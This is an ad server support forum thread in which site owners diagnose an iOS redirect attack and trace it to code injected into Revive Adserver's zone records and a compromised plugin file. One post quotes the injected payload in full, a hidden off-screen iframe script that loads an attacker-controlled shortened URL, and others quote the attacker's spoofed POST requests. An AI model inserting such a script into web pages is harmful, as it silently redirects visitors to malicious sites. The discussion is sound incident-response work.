Mobile ads have been hijacked

[Snaggy]

Hi folks. We've been using Revive ads on our website for many months now, with no problems, but yesterday all of our iOS traffic was hijacked by a rogue spam script of some kind. It only occurred on iOS devices, like iPads and iPhones, not Macs. (I didn't have Android or Windows to test those out)

The page loads, but then a pop-up appears, closing it, sends you to a spam/malware site (mobile2018newmine.pw). I turned off all our campaigns but the attack still occurred. The only thing that stops it is either removing the Revise code from a page, or what I did, changing the folder name of the Revise ads, which stopped the attack from launching. This of course also stops all of our ads too, but better that, than subject our traffic to the hijack.

Any ideas as to how I can fix this? I'm thinking our SQL server was compromised? I'm not sure what else would cause this, and I want to prevent this from happening in the future. Suggestions would be appreciated. 

Thanks in advance!  

 

[Ian]

Which version are you using?

[Snaggy]

Revive Adserver 4.1.3

[Ian]

And how sure are you this comes from Revive Adserver ?

[Snaggy]

On pages without the Revive code, things are normal. With it, the attack occurs. Changing the name of the Revive folder immediately stops the attack on every affected page.

I found some links on this:

How to Clean Your Hacked OpenX/Revive Adserver

and

What to do when you suspect your OpenX Source system has been hacked - Revive Support

Edited January 3, 2019 by Snaggy
spelling

[Ian]

Did you always run 4.1.3 ?

and yes, those links are good to follow

[Snaggy]

Yes always 4.1.3, with very strong passwords on the database, and admin accounts. ?

[Ian]

do you have access to the server?

[Snaggy]

yes, I have full access to the server and MySQL database. I haven't found anything suspicious yet on the server, and haven't had time to look at the database. I'm still gathering info on what might be the issue, and what can be done.  I'm assuming the database has been compromised, especially after reading those articles.

[Ian]

check the append/prepend fields in rv_banners, rv_zones ... i'm still very curious on how they got access, since as far as i know there are no vulnerabilities for this version.
if you are unable to find out, could you please let me know? maybe i can take a look with you.

[Snaggy]

Thanks Ian vM, I much appreciate that. 

[sunech]

FYI i just found this thread by a user reporting virus on our site, as they on iphone/ipad get redirected to mobile2018newmine .pw as well.
I have not had time to investigate yet, but we also run Revive so I suspect this is the same as your issue. Have you made any conclusions since your post yesterday?

We are using Revive Adserver v4.1.4 and our /admin/ directory is IP restricted by Apache, so if this is a bug, it appears to be in the public-facing part of Revive.

[Snaggy]

Hi sunech, sorry to hear about your similar problems, it's a real headache, isn't it. ?

I haven't had time yet to dive in, but hopefully in the next day or so.

[sunech]

I just had time to investigate a bit now. As Ian suggests, code has been prepended in rv_zones. All my zones have had the following code added:

<style>#ifr_ads_banners{width:1600px;height:800px;position:absolute;left:-9985px;}</style><script>(function(d,e,g){g=d.createElement(e);g.src='//goo.gl/Cp8ciT';g.id='ifr_ads_banners';d.body.appendChild(g);})(document,'iframe');</script>

I do not know when this has happended, but given the timing of Snaggys post, the user report I received being within a couple of hours of it and no security vulnerabilities being known, I assume it is very recent.

If I search my access logs for POST requests and filter off 403/404 responses plus our own IP addresses, the only interesting POST I come up with is this:

[03/Jan/2019:20:38:48 +0100] "POST /www/delivery/fc.php?zoneid=0&script=bannerTypeText:oxText:genericText&Charset=UTF8&target=blank HTTP/1.0" 200 352 "https://google.com/serach?q=https://myadserverurl.com/www/delivery&aqs=chrome.1.69i57j0j7&sourceid=chrome&ie=UTF-8" "AdsBot-Google (+http://www.google.com/adsbot.html)"

The IP of the request belongs to an OVH server, not Google, and it is the only request I have from this IP address. Does anyone have any input?

[Ian]

@sunech could you copy/paste me the source of your www/delivery/fc.php please?

[sunech]

Please see below:

<?php

/*
+---------------------------------------------------------------------------+
| Revive Adserver                                                           |
| http://www.revive-adserver.com |
|                                                                           |
| Copyright: See the COPYRIGHT.txt file.                                    |
| License: GPLv2 or later, see the LICENSE.txt file.                        |
+---------------------------------------------------------------------------+
*/

/**
 * This is autogenerated file which contains all files from the "delivery_dev"
 * folder of Revive Adserver merged into a single output file. On systems
 * without a PHP opcode cache that is configured to not regularly check for
 * file updates, this autogenerated file can dramatically improve the
 * performance of Revive Adserver's delivery engine.
 *
 * !!!Warning!!!
 *
 * Do not edit this file. If you need to do any changes to any delivery file,
 * check out the source code from GitHub; make the necessary changes to the
 * file(s) in the "delivery_dev" folder; and regenerate the delivery files
 * using the script located in the "scripts/delivery" directory.
 */

if (empty($_GET['script'])) {
exit(1);
}
include_once '../../init-delivery.php';
$script = str_replace("\0", '', $_GET['script']);
$aPluginId = explode(':', $script);
$scriptFileName = MAX_PATH . rtrim($conf['pluginPaths']['plugins'], '/') . '/' . implode('/', $aPluginId) . '.delivery.php';
if (stristr($scriptFileName, '../') || stristr($scriptFileName, '..\\') || !is_readable($scriptFileName) || !is_file($scriptFileName)) {
if (empty($conf['debug']['production'])) {
echo "Unable to find delivery script ({$scriptFileName}) for specified plugin-component-identifier: {$script}";
}
exit(1);
}
include $scriptFileName;

The file does not appear to have been modified, since the rest of the files in my Revive installation.
I am not a PHP programmer unfortunately, but could it be some kind of missing  validation that allows a POST request to execute foreign PHP code, via the include at the end?

[Ian]

Thank you for your swift reply. I'll ask the developers to look into this.

[Snaggy]

I discovered the same thing...  code has been prepended in rv_zones, with the same code as sunech. 

[Matteo Beccati]

Thanks for your help. Would any of you allow me to have a closer look, in order to see if I can spot anything else that's unusual and possibly gather more information?

[sunech]

Sure thing - just sent you an e-mail to the address listed on your personal site.

[tvvpmi]

The same problem here. I have access.log switched off, so I can't confirm how the injection os comming from. I have cleared all prepend code from zones table at DB, switch on logging and waiting for another injection wave. 

[tvvpmi]

CONFIRMED the point of code injection un the prepend zones are the same @sunech has previously report

[06/Jan/2019:12:22:53 +0100] "POST /www/delivery/fc.php?zoneid=0&script=bannerTypeText:oxText:genericText&Charset=UTF8&target=blank HTTP/1.1" 200 23 "https://google.com/serach?q=https://<adserver>/www/delivery&aqs=chrome.1.69i57j0j7&sourceid=chrome&ie=UTF-8" "AdsBot-Google (+http://www.google.com/adsbot.html)"

[Ian]

@tvvpmi which version are you running ? did you upgrade from an older version in the past too ?

[Matteo Beccati]

@tvvpmi Yes, please clean up your plugins/bannerTypeText/oxText/genericText.delivery.php file, which has most likely been compromised at some point. Unfortunately the logs sent by @sunech didn't cover the time when that happened.

[sunech]

@Matteo Beccati just to confirm, are you saying my plugins/bannerTypeText/oxText/genericText.delivery.php is compromised as well?
If so, is there anywhere I can download the original file? It does not appear to be included in the stable release at the Revive website, so I assume Revive downloads the plugin somehow during the initial setup?

It seems odd that this has have been compromised though, as far as I can see the file has not been changed since August 4 when the Revive installation was set up.